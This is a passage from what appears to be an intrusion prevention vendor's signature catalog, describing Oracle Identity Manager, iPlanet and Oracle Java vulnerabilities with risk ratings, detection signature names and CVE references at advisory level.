http://www.osvdb.org/76913

Oracle-Identity-Manager-CVE-2017-10151-Default-Credentials

About this vulnerability:

A vulnerability in Oracle Identity Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1020-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Identity Manager

Type:

Malfunction

Description:

Oracle Identity Manager has a vulnerability, which is due to the presence of default credentials. A remote attacker can exploit the vulnerability by using the default credentials.

Situation:

HTTP_CS-Oracle-Identity-Manager-CVE-2017-10151-Default-Credentials

References:

CVE-2017-10151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10151

Oracle-Iplanet-Web-Server-Information-Disclosure-Attack

About this vulnerability:

A vulnerability in Oracle iPlanet Web Server.

Risk:

High

First detected in:

sgpkg-ips-1440-5242

Last changed:

sgpkg-ips-1440-5242

Platform:

Generic

Software:

Oracle iPlanet Web Server

Type:

Malfunction

Description:

A vulnerability in Oracles iPlanet Web Server, versions 7.0.x, which allows remote attacker to gain access to sensitive information without authentication, including encryption keys, JVM configuration and other data, by sending a modified request to a target server.

Situation:

HTTP_CSU-Oracle-Iplanet-Web-Server-Information-Disclosure-Attack

References:

CVE-2020-9315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9315

Oracle-Java-2d-Imaginglib-Integer-Overflow

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Integer Overflow

Description:

A code execution vulnerability exists in the 2D component of Oracle Java. The vulnerability is due to an integer overflow in the ImagingLib class. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation of this vulnerability can result in the execution of arbitrary code on a target system in the context of the affected service.

Situation:

File-Binary_Oracle-Java-2d-Imaginglib-Integer-Overflow

References:

CVE-2013-0809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0809

BID-58296
http://www.securityfocus.com/bid/58296

OSVDB-90837
http://www.osvdb.org/90837

Oracle-Java-7-Applet-Remote-Code-Execution

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment

Risk:

Moderate

First detected in:

sgpkg-ips-472-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Malfunction

Description:

There is a vulnerability in Oracle Java Runtime Environment that allows remote code execution

Situation:

File-Binary_Oracle-Java-7-Applet-Remote-Code-Execution
File-Zip_Oracle-Java-7-Applet-Remote-Code-Execution

References:

CVE-2012-4681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4681

OSVDB-84867
http://www.osvdb.org/84867

Oracle-Java-Applet-Rhino-Script-Engine-Policy-Bypass

About this vulnerability:

A vulnerability in Oracle JDK and JRE

Risk:

High

First detected in:

sgpkg-ips-439-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Malfunction

Description:

There is a policy bypass vulnerability in the Rhino Script engine which can be used with a Java Applet to execute Java code outside of the sandbox. The vulnerability is caused by insufficient restrictions of certain instances of the error object. An attacker can exploit this vulnerability by enticing a user with sufficient privileges to open a webpage containing a Java Applet and Javascript code running the Rhino script engine. Successful exploitation can result in the execution of arbitrary Java code with full privileges of the currently logged in user.

Situation:

File-Binary_Oracle-Java-Applet-Rhino-Script-Engine-Policy-Bypass

References:

CVE-2011-3544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

BID-50218
http://www.securityfocus.com/bid/50218

OSVDB-76500
http://www.osvdb.org/76500

Oracle-Java-Atomicreferencearray-Sandbox-Breach

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

Moderate

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment; Oracle OpenJDK

Type:

Malfunction

Description:

There is a sandbox breach vulnerability in Oracle Java SE. The vulnerability is due to a design weakness in the implementation of the AtomicReferenceArray class. An unauthorized remote attacker can exploit this vulnerability by enticing the target user to open a malicious Java application or applet. Successful exploitation could breach the JRE sandbox and result in execution of arbitrary code the target system.

Situation:

File-Zip_Oracle-Java-Atomicreferencearray-Sandbox-Breach

References:

CVE-2012-0507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507

BID-52161
http://www.securityfocus.com/bid/52161

OSVDB-78413
http://www.osvdb.org/78413

Oracle-Java-Awt_setpixels-Information-Disclosure

About this vulnerability:	A vulnerability in Oracle Java SE
Risk:	Moderate
First detected in:	sgpkg-ips-589-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Java Runtime Environment
Type:	Malfunction
Description:	An information disclosure vulnerability exists in Oracle Java. The vulnerability is due to a read out of bounds error in awt_setPixels(). A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in the disclosure of the memory contents.
Situation:	File-Binary_Oracle-Java-Awt_setpixels-Information-Disclosure

Oracle-Java-Beans-Documenthandler-Xml-External-Entity

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

High

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment; Oracle Java SE Embedded; Oracle JRockit; Oracle OpenJDK

Type:

Malfunction

Description:

A XML external entity (XXE) vulnerability exists in Oracle Java. This is due to an incorrectly configured XML parser in the Beans DocumentHandler interface that readily processes XML external entities by default, causing classes that implement the interface to also process XML external entities. A remote unauthenticated attacker may exploit this vulnerability via specially crafted requests marshalled in XML to disclose files from the server's file system, cause a denial of service condition, perform server-side request forgery (SSRF), and bypass security policies.

Situation:

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities

References:

CVE-2014-0423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0423

BID-64914
http://www.securityfocus.com/bid/64914

BID-64758
http://www.securityfocus.com/bid/64758

OSVDB-102008
http://www.osvdb.org/102008

Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Oracle Java SE

Risk:

Moderate

First detected in:

sgpkg-ips-1148-5242

Last changed:

sgpkg-ips-1697-5242

Platform:

Generic

Software:

Oracle Java SE

Type:

Malfunction

Description:

Improper validation of the jnlp or jnlps URI schemes causes an arbitrary file deletion vulnerability in Oracle Java SE, which can be exploited by having the user open a web page or a file.

Situation:

HTTP_SHS-Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion
File-Text_Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion

References:

CVE-2019-2449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2449

Oracle-Java-Filedialog.show-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Microsystems Java Development Kit (JDK)

Risk:

Moderate

First detected in:

sgpkg-ips-431-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in Oracle Java Runtime Environment. The vulnerability is caused by not validating the size of the file name passed to FileDialog dialogue box. This can be exploited to a overflow a heap buffer which could possibly lead to arbitrary code execution. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.

Situation:

File-Binary_Oracle-Java-Filedialog.show-Heap-Buffer-Overflow

References:

CVE-2011-0802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0802

Oracle-Java-Final-Field-Overwrite

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Malfunction

Description:

A design weakness vulnerability exists in Oracle Java. The vulnerability allows a user to overwrite final fields using reflection. This can result in the modification of restricted fields such as the SecurityManager. A remote attacker can exploit this vulnerability by enticing a user to view a specially crafted web page containing a Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Binary_Oracle-Java-Final-Field-Overwrite
File-Zip_Oracle-Java-Final-Field-Overwrite

References:

CVE-2013-2423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423

BID-59162
http://www.securityfocus.com/bid/59162

OSVDB-92348
http://www.osvdb.org/92348

Oracle-Java-Font-Parsing-maxPoints-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Oracle Java Runtime Environment (JRE)
Risk:	High
First detected in:	sgpkg-ips-490-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Java Runtime Environment; Oracle Java Development Kit
Type:	Buffer Overflow
Description:	A heap memory corruption vulnerability exists in Oracle Java Runtime. The vulnerability is due to the font parsing code failing to check the "maxPoints" value used in controlling heap memory operation. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a malicious web page containing a java applet. Successful exploitation would cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.
Situation:	File-Binary_Oracle-Java-Font-Parsing-maxPoints-Heap-Buffer-Overflow

Oracle-Java-Font-Parsing-Mort-Table-Ligature-Subtable-Buffer-Overflow

About this vulnerability:	A vulnerability in Oracle Java Development Kit (JDK)
Risk:	High
First detected in:	sgpkg-ips-561-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Java Development Kit; Oracle Java Runtime Environment
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability exists in Oracle Java. The vulnerability is due to the font parsing code failing to validate the ligature subtable of the mort table in a TrueType (TTF) font file. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a malicious web page containing a java applet. Successful exploitation would cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.
Situation:	File-Binary_Oracle-Java-Font-Parsing-Mort-Table-Ligature-Subtable-Buffer-Overflow

Oracle-Java-Font-Processing-Memory-Corruption

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle JavaFX; Oracle Java Development Kit

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Oracle Java. The vulnerability is due to insufficient validation of the CFF table while parsing OTF fonts. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a maliciously crafted web page containing a Java applet. This can lead to code execution in the context of the affected user.

Situation:

File-Zip_Oracle-Java-Font-Processing-Memory-Corruption

References:

CVE-2013-1491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1491

OSVDB-91204
http://www.osvdb.org/91204

Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle Java Development Kit; Oracle SDK for Solaris

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in Oracle Java.

Situation:

HTTP_SS-Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
File-Text_Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
File-Text_JavaScript-Cookie-Xor-Obfuscation-Method

References:

CVE-2010-3552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3552

BID-44023
http://www.securityfocus.com/bid/44023

Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle Java Development Kit

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Oracle Java Runtime. The vulnerability is due to a memory corruption error in the IntegerComponentRaster class from jre/bin/awt.dll. A remote attacker can exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation of this vulnerability can result in the execution of arbitrary code within the context of the currently logged-in user.

Situation:

File-Binary_Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption
File-Zip_Oracle-Java-Java.awt.image.integercomponentraster-Memory-Corruption

References:

CVE-2013-2471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471

BID-60659
http://www.securityfocus.com/bid/60659

OSVDB-94357
http://www.osvdb.org/94357

Oracle-Java-Java.sql.drivermanager-Sandbox-Bypass

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle Java Development Kit

Type:

Malfunction

Description:

A sandbox bypass vulnerability exists in Oracle Java. The vulnerability is due to a call to toString() within a privileged block of a method in the java.sql.DriverManager class. This can allow an attacker to create a toString() method that is executed with elevated privileges. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Zip_Oracle-Java-Java.sql.drivermanager-Sandbox-Bypass

References:

CVE-2013-1488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488

OSVDB-91472
http://www.osvdb.org/91472

Oracle-Java-Java.util.concurrent.concurrenthashmap-Memory-Corruption

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Oracle Java. The vulnerability is due to insufficient validation of segmentShift and segmentMask fields of java.util.concurrent.ConcurrentHashMap objects. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a web page containing a maliciously crafted Java applet. Successful exploitation would cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.

Situation:

File-Binary_Java-Java.util.concurrent.concurrenthashmap-Memory-Corruption

References:

CVE-2013-2426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2426

OSVDB-92365
http://www.osvdb.org/92365

Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach

About this vulnerability:

A vulnerability in Oracle JRE

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Input Validation

Description:

A code execution vulnerability exists in Oracle Java's Java Management Extension (JMX) library. The vulnerability is due to insecure use of certain JMX classes. An unauthenticated remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. Successful exploitation can result in the execution of arbitrary Java code outside the sandbox.

Situation:

File-Binary_Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach
File-Zip_Oracle-Java-Jmx-Findclass-And-Elementfromcomplex-Sandbox-Breach

References:

CVE-2013-0431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431

BID-57726
http://www.securityfocus.com/bid/57726

OSVDB-89613
http://www.osvdb.org/89613

Oracle-Java-PhantomReference-Use-After-Free

About this vulnerability:

A vulnerability in Oracle Java SE

Risk:

High

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java SE

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Oracle Java. The vulnerability is due to a use after free error when handling phantom object references in the Hotspot JVM garbage collector. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-Binary_Oracle-Java-PhantomReference-Use-After-Free

References:

CVE-2015-0395
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0395

BID-72142
http://www.securityfocus.com/bid/72142

OSVDB-117228
http://www.osvdb.org/117228

Oracle-Java-Private-Methodhandle-Sandbox-Bypass

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

High

First detected in:

sgpkg-ips-562-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Malfunction

Description:

A sandbox bypass vulnerability exists in Oracle Java. The vulnerability is due to a failure to restrict access to private methods via reflection. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Binary_Oracle-Java-Private-Methodhandle-Sandbox-Bypass

References:

CVE-2013-5893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5893

BID-64863
http://www.securityfocus.com/bid/64863

BID-64758
http://www.securityfocus.com/bid/64758

OSVDB-102000
http://www.osvdb.org/102000

Oracle-Java-Rmi-Services-Default-Configuration-Remote-Code-Execution

About this vulnerability:

A vulnerability in Oracle Java

Risk:

Moderate

First detected in:

sgpkg-ips-432-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Malfunction

Description:

A vulnerability exists in Oracle Java RMI Services. The vulnerability is due to the default configuration of the RMI Registry and RMI Activation services allowing the loading of classes from a remote URL. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted RMI message to a target server. In an attack scenario where code execution is successful the injected code will be executed within the security context of the target service.

Situation:

File-Zip_Oracle-Java-Rmi-Services-Default-Configuration-Remote-Code-Execution

References:

CVE-2011-3556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556

BID-50231
http://www.securityfocus.com/bid/50231

OSVDB-76505
http://www.osvdb.org/76505

Oracle-Java-Runtime-Bytecode-Verifier-Cache-Code-Execution

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-464-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Input Validation

Description:

There is a vulnerability in Oracle Java Bytecode verifier. The vulnerability can be used by an attacker to create a type confusion or other errors in the handling of Java bytecode. A remote attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page containing a Java applet or running a Java Archive (JAR) file. Successful exploitation could allow the Java code to escape the sandbox and run in the context of the currently logged in user.

Situation:

File-Zip_Oracle-Java-Runtime-Bytecode-Verifier-Cache-Code-Execution

References:

CVE-2012-1723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723

OSVDB-82877
http://www.osvdb.org/82877

Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle JRE

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in Oracle Java Runtime. The vulnerability is due to insufficient validation of the 'count' property of the 'curveType' object in the CMM module of the Oracle JVM. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious Java applet with a vulnerable application. In a successful attack, where arbitrary code is injected and executed on the vulnerable target host, the behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker would run with the privileges of the logged in user. In an attack where code execution fails, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow
File-Binary_Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow

References:

CVE-2010-0838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838

BID-39069
http://www.securityfocus.com/bid/39069

Oracle-Java-Runtime-Environment-Insecure-File-Loading

About this vulnerability:	An attempt to exploit vulnerability in Oracle Java Runtime Environment detected
Risk:	Moderate
First detected in:	sgpkg-ips-405-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Java Runtime Environment
Type:	Malfunction
Description:	A code execution vulnerability has been reported in Oracle's Java Runtime Environment. The vulnerability is due to insecure loading of a configuration file, which can be used to set JVM options, resulting in the execution of arbitrary code or commands.
Situation:	HTTP_CSU-Oracle-Java-Runtime-Environment-Insecure-File-Loading SMB-TCP_CHS_Oracle-Java-Runtime-Environment-Insecure-File-Loading

Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle Java Development Kit

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in Oracle Java Runtime. The vulnerability is due to a buffer overflow in the storeImageArray() function from jre/bin/awt.dll. A remote attacker can exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation of this vulnerability can result in the execution of arbitrary code within the context of the currently logged in user.

Situation:

File-Binary_Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow
File-Zip_Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow

References:

CVE-2013-2465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465

BID-60657
http://www.securityfocus.com/bid/60657

OSVDB-94339
http://www.osvdb.org/94339

Oracle-Java-Runtime-True-Type-Font-Idef-Opcode-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

Moderate

First detected in:

sgpkg-ips-847-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in the Oracle Java Runtime.

Situation:

File-Binary_Oracle-Java-Runtime-True-Type-Font-Idef-Opcode-Heap-Buffer-Overflow

References:

CVE-2012-0499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0499

BID-52016
http://www.securityfocus.com/bid/52016

OSVDB-79226
http://www.osvdb.org/79226

Oracle-Java-Sandbox-Breach

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

Moderate

First detected in:

sgpkg-ips-847-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Input Validation

Description:

There exist multiple vulnerabilities in Oracle Java that allow an attacker to run arbitrary Java code outside the sandbox.

Situation:

File-Binary_Oracle-Java-Sandbox-Breach

References:

CVE-2012-4681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4681

OSVDB-84867
http://www.osvdb.org/84867

Oracle-Java-SE-Gsub-Featurecount-Buffer-Overflow

About this vulnerability:	A vulnerability in Oracle Java Runtime Environment (JRE)
Risk:	High
First detected in:	sgpkg-ips-561-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Java Runtime Environment; Oracle Java Development Kit
Type:	Buffer Overflow
Description:	A heap buffer overflow vulnerability exists in Oracle Java. The vulnerability is due to the font parsing code failing to check the "FeatureCount" value of the GSUB table used in controlling heap memory allocation. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a malicious web page containing a java applet. Successful exploitation would cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.
Situation:	File-Binary_Java-SE-Gsub-Featurecount-Buffer-Overflow

Oracle-Java-SE-Gsub-Reqfeatureindex-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Java Development Kit (JDK)

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Oracle Java Runtime Environment

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in Oracle Java. The vulnerability is due to invalid processing of the ReqFeatureIndex entry in the GSUB table. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Binary_Oracle-Java-SE-Gsub-Reqfeatureindex-Buffer-Overflow

References:

CVE-2013-5907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5907

BID-64894
http://www.securityfocus.com/bid/64894

OSVDB-101995
http://www.osvdb.org/101995

Oracle-Java-SE-Ligature-Substitution-Glyph-Storage-Out-Of-Bounds-Memory-Access

About this vulnerability:

A vulnerability in Oracle Java SE

Risk:

High

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java SE

Type:

Malfunction

Description:

An out of bounds memory access vulnerability has been reported in Oracle Java SE. The vulnerability is due to an issue with insufficient validation of an index value prior to array access. This can lead to an off by one condition in the glyphStorage heap array object. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a malicious web page containing a Java applet. Successful exploitation could cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.

Situation:

File-Binary_Oracle-Java-SE-Ligature-Substitution-Glyph-Storage-Out-Of-Bounds-Memory-Access

References:

CVE-2015-0469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0469

BID-74072
http://www.securityfocus.com/bid/74072

OSVDB-120713
http://www.osvdb.org/120713

Oracle-Java-SE-OCSP-Nextupdate-Replay-Attack

About this vulnerability:

A vulnerability in Oracle Java SE

Risk:

High

First detected in:

sgpkg-ips-670-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java SE; Oracle Java SE Embedded; Oracle JRockit

Type:

Malfunction

Description:

A replay attack vulnerability exists in Oracle Java SE. The vulnerability is due to improper checking of the nextUpdate field in an OCSP response. An unauthenticated, MiTM attacker may exploit this vulnerability by replaying an old OCSP response to trick a vulnerable Java application into accepting a revoked certificate when the application attempts to verify the the revoked certificate with OCSP.

Situation:

File-Binary_Oracle-Java-SE-OCSP-Nextupdate-Replay-Attack

References:

CVE-2015-4748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4748

Oracle-Java-SE-XML-Digital-Signature-Spoofing

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Input Validation

Description:

A spoofing vulnerability has been reported in Oracle Java SE. The vulnerability is due to improper use of Canonicalization algorithm while validating the signature of a specially crafted XML file. An attacker can exploit this vulnerability to modify the content of an XML file without invalidating the signature associated with the file.

Situation:

File-TextId_Microsoft-.NET-And-Oracle-Java-SE-Xml-Digital-Signature-Spoofing

References:

CVE-2013-2461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2461

BID-60645
http://www.securityfocus.com/bid/60645

OSVDB-94350
http://www.osvdb.org/94350

Oracle-Java-Security-Bybass-Vulnerability-CVE-2013-0422

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment

Risk:

High

First detected in:

sgpkg-ips-504-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Malfunction

Description:

There is a vulnerability in Oracle Java Runtime Environment that allows remote code execution.

Situation:

File-Binary_Oracle-Java-Security-Bybass-Vulnerability-CVE-2013-0422

References:

CVE-2013-0422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422

BID-57246
http://www.securityfocus.com/bid/57246

OSVDB-89059
http://www.osvdb.org/89059

Oracle-Java-Security-Slider-Feature-Bypass

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-513-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle Java Development Kit

Type:

Malfunction

Description:

A security feature bypass vulnerability exists in Oracle Java JRE. The vulnerability occurs when a serialized class is loaded via the applet tag object attribute. This allows an attacker to run an unsigned Java applet without prompting, regardless of Java security settings. A remote attacker can exploit this vulnerability to bypass warning prompts by enticing user to open a Java applet embedded in a webpage.

Situation:

File-Text_Oracle-Java-Security-Slider-Feature-Bypass

References:

CVE-2013-1489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1489

OSVDB-89718
http://www.osvdb.org/89718

Oracle-Java-Serviceloader-Exception-Handling-Sandbox-Bypass

About this vulnerability:

A vulnerability in Oracle Java Runtime Environment (JRE)

Risk:

High

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment; Oracle Java SE Embedded; Oracle JRockit; Oracle Java Development Kit

Type:

Malfunction

Description:

A sandbox bypass vulnerability exists in Oracle Java. The vulnerability is due to a flaw in exception handling of the ServiceLoader class. This flaw could be used to disable the security manager and run Java code with full privileges. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-Binary_Oracle-Java-Serviceloader-Exception-Handling-Sandbox-Bypass

References:

CVE-2014-0457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0457

BID-66866
http://www.securityfocus.com/bid/66866

OSVDB-105867
http://www.osvdb.org/105867

